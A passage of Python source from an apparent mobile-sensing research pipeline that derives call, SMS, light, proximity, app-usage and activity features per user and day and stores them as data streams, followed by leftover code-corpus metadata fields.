        (self.get_call_four_hourly_entropy, (call_number_data,), "call_four_hourly_entropy.json"),
        (self.get_sms_daily_entropy, (sms_number_data,), "sms_daily_entropy.json"),
        (self.get_sms_hourly_entropy, (sms_number_data,), "sms_hourly_entropy.json"),
        (self.get_sms_four_hourly_entropy, (sms_number_data,), "sms_four_hourly_entropy.json"),
        (self.get_total_call_sms_daily, (call_number_data, sms_number_data), "total_call_sms_daily.json"),
        (self.get_total_call_sms_hourly, (call_number_data, sms_number_data), "total_call_sms_hourly.json"),
        (self.get_total_call_sms_four_hourly, (call_number_data, sms_number_data), "total_call_sms_four_hourly.json"),
        (self.get_total_call_daily, (call_number_data,), "total_call_daily.json"),
        (self.get_total_call_hourly, (call_number_data,), "total_call_hourly.json"),
        (self.get_total_call_four_hourly, (call_number_data,), "total_call_four_hourly.json"),
        (self.get_total_sms_daily, (sms_number_data,), "total_sms_daily.json"),
        (self.get_total_sms_hourly, (sms_number_data,), "total_sms_hourly.json"),
        (self.get_total_sms_four_hourly, (sms_number_data,), "total_sms_four_hourly.json"),
    ]
    for compute, args, filepath in features:
        try:
            data = compute(*args)
            if data:
                self.store_stream(filepath=filepath,
                                  input_streams=[input_callstream, input_smsstream],
                                  user_id=user_id, data=data, localtime=False)
        except Exception as e:
            self.CC.logging.log("Exception:", str(e))
            self.CC.logging.log(str(traceback.format_exc()))
def process_callsmsstream_day_data(self, user_id: str, callstream: List[DataPoint],
                                   smsstream: List[DataPoint], input_callstream: DataStream,
                                   input_smsstream: DataStream):
    """
    Process all the call and sms related features and store them as datastreams.

    Each feature runs in its own try/except so one failing feature cannot block
    the rest; failures are logged. Every feature's output metadata file is
    "<feature_method_name>.json", which exactly matches the original
    hand-written store_stream calls.

    :param str user_id: UUID of the stream owner
    :param List(DataPoint) callstream: Phone call duration data stream
    :param List(DataPoint) smsstream: SMS length data stream
    :param DataStream input_callstream: DataStream object of phone call stream
    :param DataStream input_smsstream: DataStream object of SMS call stream
    :return:
    """
    # (feature methods, argument tuple, provenance input streams)
    feature_groups = [
        # Features over the combined call + sms streams.
        ([self.average_inter_phone_call_sms_time_hourly,
          self.average_inter_phone_call_sms_time_four_hourly,
          self.average_inter_phone_call_sms_time_daily,
          self.variance_inter_phone_call_sms_time_daily,
          self.variance_inter_phone_call_sms_time_hourly,
          self.variance_inter_phone_call_sms_time_four_hourly],
         (callstream, smsstream), [input_callstream, input_smsstream]),
        # Call-only features.
        ([self.average_inter_phone_call_time_hourly,
          self.average_inter_phone_call_time_four_hourly,
          self.average_inter_phone_call_time_daily,
          self.variance_inter_phone_call_time_hourly,
          self.variance_inter_phone_call_time_four_hourly,
          self.variance_inter_phone_call_time_daily,
          self.average_call_duration_daily,
          self.average_call_duration_hourly,
          self.average_call_duration_four_hourly,
          self.variance_call_duration_daily,
          self.variance_call_duration_hourly,
          self.variance_call_duration_four_hourly],
         (callstream,), [input_callstream]),
        # SMS-only features.
        ([self.average_inter_sms_time_hourly,
          self.average_inter_sms_time_four_hourly,
          self.average_inter_sms_time_daily,
          self.variance_inter_sms_time_hourly,
          self.variance_inter_sms_time_four_hourly,
          self.variance_inter_sms_time_daily,
          self.average_sms_length_daily,
          self.average_sms_length_hourly,
          self.average_sms_length_four_hourly,
          self.variance_sms_length_daily,
          self.variance_sms_length_hourly,
          self.variance_sms_length_four_hourly],
         (smsstream,), [input_smsstream]),
    ]
    for methods, args, streams in feature_groups:
        for compute in methods:
            try:
                data = compute(*args)
                if data:
                    # Metadata file is named after the feature method.
                    self.store_stream(filepath="{}.json".format(compute.__name__),
                                      input_streams=streams, user_id=user_id,
                                      data=data, localtime=False)
            except Exception as e:
                self.CC.logging.log("Exception:", str(e))
                self.CC.logging.log(str(traceback.format_exc()))
def process_light_day_data(self, user_id: str, lightdata: List[DataPoint], input_lightstream: DataStream):
    """
    Process all the ambient light related features and store the output streams.

    Each feature runs in its own try/except so one failing feature cannot block
    the rest; failures are logged. Every feature's output metadata file is
    "<feature_method_name>.json", matching the original hand-written calls.

    :param str user_id: UUID of the stream owner
    :param List(DataPoint) lightdata: Ambient light data stream
    :param DataStream input_lightstream: DataStream object of Ambient light stream
    :return:
    """
    features = [
        self.average_ambient_light_daily,
        self.average_ambient_light_hourly,
        self.average_ambient_light_four_hourly,
        self.variance_ambient_light_daily,
        self.variance_ambient_light_hourly,
        self.variance_ambient_light_four_hourly,
    ]
    for compute in features:
        try:
            data = compute(lightdata)
            if data:
                # Metadata file is named after the feature method.
                self.store_stream(filepath="{}.json".format(compute.__name__),
                                  input_streams=[input_lightstream], user_id=user_id,
                                  data=data, localtime=False)
        except Exception as e:
            self.CC.logging.log("Exception:", str(e))
            self.CC.logging.log(str(traceback.format_exc()))
def process_proximity_day_data(self, user_id: str, proximitystream: List[DataPoint],
                               input_proximitystream: DataStream):
    """
    Process all proximity related modules.

    Computes the phone-outside-pocket duration and stores it as an output
    stream; any failure is logged rather than propagated.

    :param str user_id: UUID of the stream owner
    :param List(DataPoint) proximitystream: Phone proximity data stream
    :param DataStream input_proximitystream: DataStream object of proximity data stream
    :return:
    """
    try:
        outside_duration = self.calculate_phone_outside_duration(proximitystream)
        if not outside_duration:
            return
        self.store_stream(filepath="phone_outside_duration.json",
                          input_streams=[input_proximitystream],
                          user_id=user_id, data=outside_duration)
    except Exception as e:
        self.CC.logging.log("Exception:", str(e))
        self.CC.logging.log(str(traceback.format_exc()))
def get_overlapped_value(self, px1, py1, px2, py2):
    """
    Return the overlap, in minutes, of intervals [px1, py1] and [px2, py2].

    :param px1: start of the first interval (datetime)
    :param py1: end of the first interval (datetime)
    :param px2: start of the second interval (datetime)
    :param py2: end of the second interval (datetime)
    :return: overlapped duration in minutes, or 0 when the intervals are disjoint
    """
    latest_start = max(px1, px2)
    earliest_end = min(py1, py2)
    if latest_start > earliest_end:
        # Disjoint intervals — nothing overlaps.
        return 0
    overlap = earliest_end - latest_start
    return overlap.total_seconds() / 60
def process_appusage_context_day_data(self, user_id: str, app_usage_data: List[DataPoint],
                                      input_usage_stream: DataStream, gps_semantic_data: List[DataPoint],
                                      input_gps_semantic_stream: DataStream):
    """
    Process appusage related modules: total and average app usage per category,
    overall and broken down by semantic location (work / home / outside).

    :param str user_id: UUID of stream owner
    :param List(DataPoint) app_usage_data: App usage stream data
    :param DataStream input_usage_stream: DataStream object of app usage stream
    :param List(DataPoint) gps_semantic_data: GPS semantic location data split day-wise (localtime false)
    :param DataStream input_gps_semantic_stream: DataStream object of the gps semantic day-wise data
    :return:
    """
    if not app_usage_data:
        return
    # Per-category usage minutes in four contexts:
    # total[0] = whole day, total[1] = at work, total[2] = at home,
    # total[3] = everywhere else (day minus work minus home).
    total = [{}, {}, {}, {}]
    try:
        # app_usage_data[0].sample maps category -> list of usage episodes;
        # each episode is a dict with "start_time"/"end_time" datetimes
        # (presumed from the subtraction below — TODO confirm against producer).
        for category, data in app_usage_data[0].sample.items():
            total[0][category] = 0
            total[1][category] = 0
            total[2][category] = 0
            total[3][category] = 0
            for d in data:
                # Full duration of the episode, in minutes.
                total[0][category] += (d["end_time"] - d["start_time"]).total_seconds() / 60
                # Attribute the part of the episode that overlaps a semantic
                # location interval to that location's bucket.
                for gd in gps_semantic_data:
                    val = self.get_overlapped_value(d["start_time"], d["end_time"], gd.start_time, gd.end_time)
                    if gd.sample == "work":
                        total[1][category] += val
                    elif gd.sample == "home":
                        total[2][category] += val
            # "Outside" is whatever is left of the day's total.
            total[3][category] = total[0][category] - total[1][category] - total[2][category]
        # Hours spent in each context; index meaning mirrors `total`.
        # NOTE(review): context_total[0] = 24 assumes a complete day of data — confirm.
        context_total = [24, 0, 0, 0]
        for gd in gps_semantic_data:
            if gd.sample == "work":
                context_total[1] += (gd.end_time - gd.start_time).total_seconds() / (60 * 60)
            elif gd.sample == "home":
                context_total[2] += (gd.end_time - gd.start_time).total_seconds() / (60 * 60)
        context_total[3] = context_total[0] - context_total[1] - context_total[2]
        # All emitted DataPoints span the full civil day of the first sample,
        # in that sample's timezone.
        st = app_usage_data[0].start_time.date()
        start_time = datetime.datetime.combine(st, datetime.time.min)
        start_time = start_time.replace(tzinfo=app_usage_data[0].start_time.tzinfo)
        end_time = datetime.datetime.combine(st, datetime.time.max)
        end_time = end_time.replace(tzinfo=app_usage_data[0].start_time.tzinfo)
        dp1 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[0])
        # Location-specific outputs only make sense when GPS semantics exist.
        if input_gps_semantic_stream:
            dp2 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[1])
            dp3 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[2])
            dp4 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[3])
        self.store_stream(filepath="appusage_duration_total_by_category.json",
                          input_streams=[input_usage_stream], user_id=user_id,
                          data=[dp1], localtime=False)
        if input_gps_semantic_stream:
            self.store_stream(filepath="appusage_duration_total_by_category_work.json",
                              input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
                              data=[dp2], localtime=False)
            self.store_stream(filepath="appusage_duration_total_by_category_home.json",
                              input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
                              data=[dp3], localtime=False)
            self.store_stream(filepath="appusage_duration_total_by_category_outside.json",
                              input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
                              data=[dp4], localtime=False)
        # Normalize minutes-per-category by hours spent in each context to get
        # an average usage rate; contexts with zero hours keep the raw totals.
        # NOTE(review): this divides the SAME dicts already wrapped in dp1..dp4
        # above — assumes store_stream has fully consumed/serialized them by
        # this point; verify it does not keep live references to the samples.
        for i in range(4):
            if context_total[i] == 0:
                continue
            for category in app_usage_data[0].sample:
                total[i][category] /= context_total[i]
        dp5 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[0])
        if input_gps_semantic_stream:
            dp6 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[1])
            dp7 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[2])
            dp8 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[3])
        self.store_stream(filepath="appusage_duration_average_by_category.json",
                          input_streams=[input_usage_stream], user_id=user_id,
                          data=[dp5], localtime=False)
        if input_gps_semantic_stream:
            self.store_stream(filepath="appusage_duration_average_by_category_work.json",
                              input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
                              data=[dp6], localtime=False)
            self.store_stream(filepath="appusage_duration_average_by_category_home.json",
                              input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
                              data=[dp7], localtime=False)
            self.store_stream(filepath="appusage_duration_average_by_category_outside.json",
                              input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
                              data=[dp8], localtime=False)
    except Exception as e:
        self.CC.logging.log("Exception:", str(e))
        self.CC.logging.log(str(traceback.format_exc()))
def process_appcategory_day_data(self, user_id: str, appcategorystream: List[DataPoint],
                                 input_appcategorystream: DataStream):
    """
    Process all app category related features: map each app-package sample to
    its category and store the resulting stream.

    :param str user_id: UUID of the stream owner
    :param List(DataPoint) appcategorystream: App category stream data
    :param DataStream input_appcategorystream: DataStream object of the app category stream
    :return:
    """
    try:
        data = []
        for d in appcategorystream:
            # Only string samples (app package names) can be categorized.
            if not isinstance(d.sample, str):
                continue
            # Bug fix: the old code aliased the input DataPoint (dnew = d) and
            # then overwrote its sample, mutating the caller's stream in place.
            # Work on a copy so the input data stays untouched.
            dnew = copy.deepcopy(d)
            dnew.sample = self.get_app_category(d.sample)
            data.append(dnew)
        if data:
            self.store_stream(filepath="app_usage_category.json",
                              input_streams=[input_appcategorystream],
                              user_id=user_id, data=data)
    except Exception as e:
        self.CC.logging.log("Exception:", str(e))
        self.CC.logging.log(str(traceback.format_exc()))
def get_total_phone_activity_time_by_type(self, data: List[DataPoint], activity_type: float) -> List[DataPoint]:
    """
    Total time in a day of type 'activity_type'.

    Scans the day's activity samples for consecutive runs of the requested
    type and sums the elapsed time of each run.

    :param List(DataPoint) data: Phone activity API stream data points
    :param float activity_type: The activity summary to be calculated ranging from 0 to 7
    :return: List with single data point including the total time phone found the 'activity_type' in minutes
    :rtype: List(DataPoint)
    """
    if not data:
        return None
    n = len(data)
    total_seconds = 0
    idx = 0
    while idx < n:
        if data[idx].sample[0] != activity_type:
            idx += 1
            continue
        # Beginning of a run of the requested activity.
        run_start = data[idx].start_time
        nxt = idx + 1
        while nxt < n and data[nxt].sample[0] == activity_type:
            nxt += 1
        # A run ends at the first point of a different type, or at the last
        # observed point when it extends to the end of the data.
        run_end = data[-1].start_time if nxt == n else data[nxt].start_time
        total_seconds += (run_end - run_start).total_seconds()
        idx = nxt + 1
    # Report one DataPoint spanning the whole civil day of the first sample.
    start_time = copy.deepcopy(data[0].start_time)
    start_time = start_time.replace(hour=0, minute=0, second=0, microsecond=0)
    end_time = datetime.datetime.combine(start_time.date(), datetime.time.max)
    end_time = end_time.replace(tzinfo=data[0].start_time.tzinfo)
    return [DataPoint(start_time, end_time, data[0].offset, total_seconds / 60)]
def process_phone_activity_day_data(self, user_id: str, activity_data: List[DataPoint],
                                    input_activity_stream: DataStream):
    """
    Process all phone activity API stream related features.

    Each activity type's total time is computed and stored in its own
    try/except so one failure never blocks the rest; failures are logged.

    :param str user_id: UUID of the stream owner
    :param List(DataPoint) activity_data: Phone activity API stream data points
    :param DataStream input_activity_stream: DataStream object of phone activity data
    :return:
    """
    # (activity-type constant, output metadata file). Note: unlike other
    # process_* methods, `data` is stored unconditionally (even when None),
    # preserving the original behavior.
    activity_outputs = [
        (IN_VEHICLE, "driving_time_from_phone_activity.json"),
        (ON_BICYCLE, "bicycle_time_from_phone_activity.json"),
        (STILL, "still_time_from_phone_activity.json"),
        (ON_FOOT, "on_foot_time_from_phone_activity.json"),
        (TILTING, "tilting_time_from_phone_activity.json"),
        (WALKING, "walking_time_from_phone_activity.json"),
        (RUNNING, "running_time_from_phone_activity.json"),
        (UNKNOWN, "unknown_time_from_phone_activity.json"),
    ]
    for activity_type, filepath in activity_outputs:
        try:
            data = self.get_total_phone_activity_time_by_type(activity_data, activity_type)
            self.store_stream(filepath=filepath,
                              input_streams=[input_activity_stream], user_id=user_id,
                              data=data, localtime=False)
        except Exception as e:
            self.CC.logging.log("Exception:", str(e))
            self.CC.logging.log(str(traceback.format_exc()))
def get_percent_initiated_call(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Percent of time the user initiated a call for a day.

    :param List(DataPoint) data: Call type stream data points
    :return: List of single data point with percent of call initiated for the day
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Count outgoing (user-initiated) calls. (Removed unused `i` counter and
    # replaced the manual counting loop with sum().)
    count = sum(1 for d in data if d.sample == OUTGOING_TYPE)
    # Single DataPoint spanning the whole civil day of the first sample.
    start_time = copy.deepcopy(data[0].start_time)
    start_time = start_time.replace(hour=0, minute=0, second=0, microsecond=0)
    end_time = datetime.datetime.combine(start_time.date(), datetime.time.max)
    end_time = end_time.replace(tzinfo=data[0].start_time.tzinfo)
    return [DataPoint(start_time, end_time, data[0].offset, 100.0 * count / len(data))]
def get_percent_initiated_sms(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Percent of time the user initiated a SMS for a day.

    :param List(DataPoint) data: SMS type stream data points
    :return: List of single data point with percent of SMS initiated for the day
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Count sent (user-initiated) messages. (Removed unused `i` counter and
    # replaced the manual counting loop with sum().)
    count = sum(1 for d in data if d.sample == MESSAGE_TYPE_SENT)
    # Single DataPoint spanning the whole civil day of the first sample.
    start_time = copy.deepcopy(data[0].start_time)
    start_time = start_time.replace(hour=0, minute=0, second=0, microsecond=0)
    end_time = datetime.datetime.combine(start_time.date(), datetime.time.max)
    end_time = end_time.replace(tzinfo=data[0].start_time.tzinfo)
    return [DataPoint(start_time, end_time, data[0].offset, 100.0 * count / len(data))]
def get_percent_initiated_callsms(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Percent of time the user initiated a Call or SMS for a day.

    :param List(DataPoint) calldata: Call type stream data points
    :param List(DataPoint) smsdata: SMS type stream data points
    :return: List of single data point with percent of Call and SMS initiated for the day
    :rtype: List(DataPoint) or None
    """
    data = calldata + smsdata
    if not data:
        return None
    # NOTE(review): SMS samples are compared against OUTGOING_TYPE here, not
    # MESSAGE_TYPE_SENT. Android uses the value 2 for both constants, in which
    # case this is equivalent — confirm the constants share a value, otherwise
    # sent SMS are miscounted. (Removed unused `i` counter; loop -> sum().)
    count = sum(1 for d in data if d.sample == OUTGOING_TYPE)
    # Single DataPoint spanning the whole civil day of the first sample.
    start_time = copy.deepcopy(data[0].start_time)
    start_time = start_time.replace(hour=0, minute=0, second=0, microsecond=0)
    end_time = datetime.datetime.combine(start_time.date(), datetime.time.max)
    end_time = end_time.replace(tzinfo=data[0].start_time.tzinfo)
    return [DataPoint(start_time, end_time, data[0].offset, 100.0 * count / len(data))]
def process_callsms_type_day_data(self, user_id: str, calltype_data: List[DataPoint], smstype_data: List[DataPoint],
                                  input_call_type_stream: DataStream, input_sms_type_stream: DataStream):
    """
    Compute and store all features derived from the call type and SMS type
    streams for one day.

    :param str user_id: UUID of the stream owner
    :param List(DataPoint) calltype_data: Call type stream data points
    :param List(DataPoint) smstype_data: SMS type stream data points
    :param DataStream input_call_type_stream: DataStream object of call type stream
    :param DataStream input_sms_type_stream: DataStream object of sms type stream
    :return:
    """
    # (feature callable, its arguments, output file, provenance streams)
    feature_tasks = [
        (self.get_percent_initiated_call, (calltype_data,),
         "call_initiated_percent_daily.json", [input_call_type_stream]),
        (self.get_percent_initiated_sms, (smstype_data,),
         "sms_initiated_percent_daily.json", [input_sms_type_stream]),
        (self.get_percent_initiated_callsms, (calltype_data, smstype_data),
         "callsms_initiated_percent_daily.json", [input_call_type_stream, input_sms_type_stream]),
    ]
    # Each feature is computed and stored independently; a failure in one
    # is logged and must not prevent the others from being stored.
    for feature, args, filepath, streams in feature_tasks:
        try:
            result = feature(*args)
            self.store_stream(filepath=filepath,
                              input_streams=streams, user_id=user_id,
                              data=result, localtime=False)
        except Exception as e:
            self.CC.logging.log("Exception:", str(e))
            self.CC.logging.log(str(traceback.format_exc()))
def process_data(self, user_id: str, all_user_streams: dict, all_days: List[str]):
    """
    Getting all the necessary input datastreams for a user
    and run all feature processing modules for all the days
    of the user.
    :param str user_id: UUID of the stream owner
    :param dict all_user_streams: Dictionary containing all the user streams, where key is the stream name, value
                                  is the stream metadata
    :param List(str) all_days: List of all days for the processing in the format 'YYYYMMDD'
    :return:
    """
    # Metadata placeholders, filled in below when the corresponding
    # raw stream is found among the user's streams.
    input_callstream = None
    input_smsstream = None
    input_proximitystream = None
    input_cuappusagestream = None
    input_appcategorystream = None
    input_lightstream = None
    input_appusage_stream = None
    input_gpssemanticstream = None
    input_callnumberstream = None
    input_smsnumberstream = None
    input_activity_stream = None
    input_call_type_stream = None
    input_sms_type_stream = None
    # Names of the raw (ingested) phone streams.
    call_stream_name = 'CU_CALL_DURATION--edu.dartmouth.eureka'
    sms_stream_name = 'CU_SMS_LENGTH--edu.dartmouth.eureka'
    proximity_stream_name = 'PROXIMITY--org.md2k.phonesensor--PHONE'
    cu_appusage_stream_name = 'CU_APPUSAGE--edu.dartmouth.eureka'
    light_stream_name = 'AMBIENT_LIGHT--org.md2k.phonesensor--PHONE'
    # Names of derived streams produced by earlier feature modules.
    appcategory_stream_name = "org.md2k.data_analysis.feature.phone.app_usage_category"
    appusage_stream_name = "org.md2k.data_analysis.feature.phone.app_usage_interval"
    gpssemantic_stream_name = "org.md2k.data_analysis.feature.gps_semantic_location.daywise_split.utc"
    call_number_stream_name = "CU_CALL_NUMBER--edu.dartmouth.eureka"
    sms_number_stream_name = "CU_SMS_NUMBER--edu.dartmouth.eureka"
    activity_stream_name = "ACTIVITY_TYPE--org.md2k.phonesensor--PHONE"
    call_type_stream_name = "CU_CALL_TYPE--edu.dartmouth.eureka"
    sms_type_stream_name = "CU_SMS_TYPE--edu.dartmouth.eureka"
    streams = all_user_streams
    days = None  # NOTE(review): never read in this method — dead variable
    if not streams or not len(streams):
        self.CC.logging.log('No streams found for user %s for feature %s'
                            % (str(user_id), self.__class__.__name__))
        return
    # Bind each recognized stream name to its metadata placeholder.
    for stream_name, stream_metadata in streams.items():
        if stream_name == call_stream_name:
            input_callstream = stream_metadata
        elif stream_name == sms_stream_name:
            input_smsstream = stream_metadata
        elif stream_name == proximity_stream_name:
            input_proximitystream = stream_metadata
        elif stream_name == cu_appusage_stream_name:
            input_cuappusagestream = stream_metadata
        elif stream_name == light_stream_name:
            input_lightstream = stream_metadata
        elif stream_name == call_number_stream_name:
            input_callnumberstream = stream_metadata
        elif stream_name == sms_number_stream_name:
            input_smsnumberstream = stream_metadata
        elif stream_name == activity_stream_name:
            input_activity_stream = stream_metadata
        elif stream_name == call_type_stream_name:
            input_call_type_stream = stream_metadata
        elif stream_name == sms_type_stream_name:
            input_sms_type_stream = stream_metadata
    # Processing Call and SMS related features (requires BOTH streams).
    if not input_callstream:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, call_stream_name,
                             str(user_id)))
    elif not input_smsstream:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, sms_stream_name,
                             str(user_id)))
    else:
        for day in all_days:
            # Durations/lengths are kept only when they are non-negative floats.
            callstream = self.get_data_by_stream_name(call_stream_name, user_id, day, localtime=False)
            callstream = self.get_filtered_data(callstream, lambda x: (type(x) is float and x >= 0))
            smsstream = self.get_data_by_stream_name(sms_stream_name, user_id, day, localtime=False)
            smsstream = self.get_filtered_data(smsstream, lambda x: (type(x) is float and x >= 0))
            self.process_callsmsstream_day_data(user_id, callstream, smsstream, input_callstream, input_smsstream)
    # Call/SMS *type* features (requires BOTH type streams).
    if not input_call_type_stream:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, call_type_stream_name,
                             str(user_id)))
    elif not input_sms_type_stream:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, sms_type_stream_name,
                             str(user_id)))
    else:
        for day in all_days:
            # Type codes are floats; negative values are allowed here.
            calltype_data = self.get_data_by_stream_name(call_type_stream_name, user_id, day, localtime=False)
            calltype_data = self.get_filtered_data(calltype_data, lambda x: (type(x) is float))
            smstype_data = self.get_data_by_stream_name(sms_type_stream_name, user_id, day, localtime=False)
            smstype_data = self.get_filtered_data(smstype_data, lambda x: (type(x) is float))
            self.process_callsms_type_day_data(user_id, calltype_data, smstype_data, input_call_type_stream,
                                               input_sms_type_stream)
    # processing proximity sensor related features
    if not input_proximitystream:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, proximity_stream_name,
                             str(user_id)))
    else:
        for day in all_days:
            # NOTE(review): unlike the other raw streams this call omits
            # localtime=False — confirm whether that is intentional.
            proximitystream = self.get_data_by_stream_name(proximity_stream_name, user_id, day)
            proximitystream = self.get_filtered_data(proximitystream, lambda x: (type(x) is float and x >= 0))
            self.process_proximity_day_data(user_id, proximitystream, input_proximitystream)
    # Processing ambient light related features
    if not input_lightstream:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, light_stream_name,
                             str(user_id)))
    else:
        for day in all_days:
            lightstream = self.get_data_by_stream_name(light_stream_name, user_id, day, localtime=False)
            lightstream = self.get_filtered_data(lightstream, lambda x: (type(x) is float and x >= 0))
            self.process_light_day_data(user_id, lightstream, input_lightstream)
    # processing app usage and category related features
    if not input_cuappusagestream:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, cu_appusage_stream_name,
                             str(user_id)))
    else:
        for day in all_days:
            appusagestream = self.get_data_by_stream_name(cu_appusage_stream_name, user_id, day)
            appusagestream = self.get_filtered_data(appusagestream, lambda x: type(x) is str)
            self.process_appcategory_day_data(user_id, appusagestream, input_cuappusagestream)
    # Processing phone touche and typing related features.
    # Streams are re-fetched because the feature modules above may have
    # registered new derived streams for this user.
    streams = self.CC.get_user_streams(user_id)
    if not streams or not len(streams):
        self.CC.logging.log('No streams found for user %s for feature %s'
                            % (str(user_id), self.__class__.__name__))
        return
    latest_appcategorystreamid = self.get_latest_stream_id(user_id,
                                                           appcategory_stream_name)
    if not latest_appcategorystreamid:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, appcategory_stream_name,
                             str(user_id)))
    else:
        input_appcategorystream = self.CC.get_stream_metadata(latest_appcategorystreamid[0]['identifier'])
        for day in all_days:
            # Derived stream — read from the analysis store (ingested_stream=False).
            appcategorydata = self.get_data_by_stream_name(appcategory_stream_name, user_id,
                                                           day, localtime=False, ingested_stream=False)
            appcategorydata = self.get_filtered_data(appcategorydata, lambda x: (type(x) is list and len(x) == 4))
            self.process_appusage_day_data(user_id, appcategorydata, input_appcategorystream)
    # Refresh again before the app-usage/GPS-context features.
    streams = self.CC.get_user_streams(user_id)
    if not streams or not len(streams):
        self.CC.logging.log('No streams found for user %s for feature %s'
                            % (str(user_id), self.__class__.__name__))
        return
    latest_appusage_streamid = self.get_latest_stream_id(user_id,
                                                         appusage_stream_name)
    latest_gps_semantic_streamid = self.get_latest_stream_id(user_id,
                                                             gpssemantic_stream_name)
    if not latest_appusage_streamid:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, appusage_stream_name,
                             str(user_id)))
    else:
        input_appusage_stream = self.CC.get_stream_metadata(latest_appusage_streamid[0]['identifier'])
        # NOTE(review): latest_gps_semantic_streamid is never checked for
        # emptiness before indexing — this would raise if the GPS semantic
        # stream is missing while the app-usage stream exists. Confirm.
        input_gpssemanticstream = self.CC.get_stream_metadata(latest_gps_semantic_streamid[0]['identifier'])
        for day in all_days:
            app_usage_data = self.get_data_by_stream_name(appusage_stream_name, user_id, day,
                                                          localtime=False,
                                                          ingested_stream=False)
            app_usage_data = self.get_filtered_data(app_usage_data, lambda x: type(x) is dict)
            gps_semantic_data = self.get_data_by_stream_name(gpssemantic_stream_name, user_id,
                                                             day, localtime=False, ingested_stream=False)
            gps_semantic_data = self.get_filtered_data(gps_semantic_data,
                                                       lambda x: ((type(x) is str) or (type(x) is np.str_)))
            self.process_appusage_context_day_data(user_id, app_usage_data, input_appusage_stream,
                                                   gps_semantic_data, input_gpssemanticstream)
    # Call/SMS number features (requires BOTH number streams).
    if not input_callnumberstream:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, call_number_stream_name,
                             str(user_id)))
    elif not input_smsnumberstream:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, sms_number_stream_name,
                             str(user_id)))
    else:
        for day in all_days:
            callnumberdata = self.get_data_by_stream_name(call_number_stream_name, user_id, day, localtime=False)
            callnumberdata = self.get_filtered_data(callnumberdata, lambda x: (type(x) is str))
            smsnumberdata = self.get_data_by_stream_name(sms_number_stream_name, user_id, day, localtime=False)
            smsnumberdata = self.get_filtered_data(smsnumberdata, lambda x: (type(x) is str))
            self.process_callsmsnumber_day_data(user_id, callnumberdata, smsnumberdata, input_callnumberstream,
                                                input_smsnumberstream)
    # processing phone activity data related features
    if not input_activity_stream:
        self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
                            "USERID %s" %
                            (self.__class__.__name__, activity_stream_name,
                             str(user_id)))
    else:
        for day in all_days:
            activity_data = self.get_data_by_stream_name(activity_stream_name, user_id, day, localtime=False)
            activity_data = self.get_filtered_data(activity_data, lambda x: (type(x) is list and len(x) == 2))
            self.process_phone_activity_day_data(user_id, activity_data, input_activity_stream)
def process(self, user_id: str, all_days: List[str]):
    """
    Main processing function inherited from ComputerFeatureBase.

    :param str user_id: UUID of the user
    :param List(str) all_days: List of days with format 'YYYYMMDD'
    :return:
    """
    # Guard clause: nothing to do without a CerebralCortex handle.
    if self.CC is None:
        return
    self.CC.logging.log("Processing PhoneFeatures")
    user_streams = self.CC.get_user_streams(user_id)
    self.process_data(user_id, user_streams, all_days)
| 45.990355
| 129
| 0.595002
| 18,085
| 147,813
| 4.671275
| 0.031131
| 0.043572
| 0.023852
| 0.029356
| 0.843537
| 0.819188
| 0.79916
| 0.785784
| 0.77545
| 0.769342
| 0
| 0.009838
| 0.315757
| 147,813
| 3,213
| 130
| 46.004669
| 0.82544
| 0.176026
| 0
| 0.729995
| 0
| 0
| 0.042992
| 0.027663
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036968
| false
| 0
| 0.008891
| 0
| 0.110435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b155a17e3d137598eacf58491f3f3858bbddc645
| 17,415
|
py
|
Python
|
test/programytest/storage/stores/sql/store/test_usergroups.py
|
cdoebler1/AIML2
|
ee692ec5ea3794cd1bc4cc8ec2a6b5e5c20a0d6a
|
[
"MIT"
] | 345
|
2016-11-23T22:37:04.000Z
|
2022-03-30T20:44:44.000Z
|
test/programytest/storage/stores/sql/store/test_usergroups.py
|
MikeyBeez/program-y
|
00d7a0c7d50062f18f0ab6f4a041068e119ef7f0
|
[
"MIT"
] | 275
|
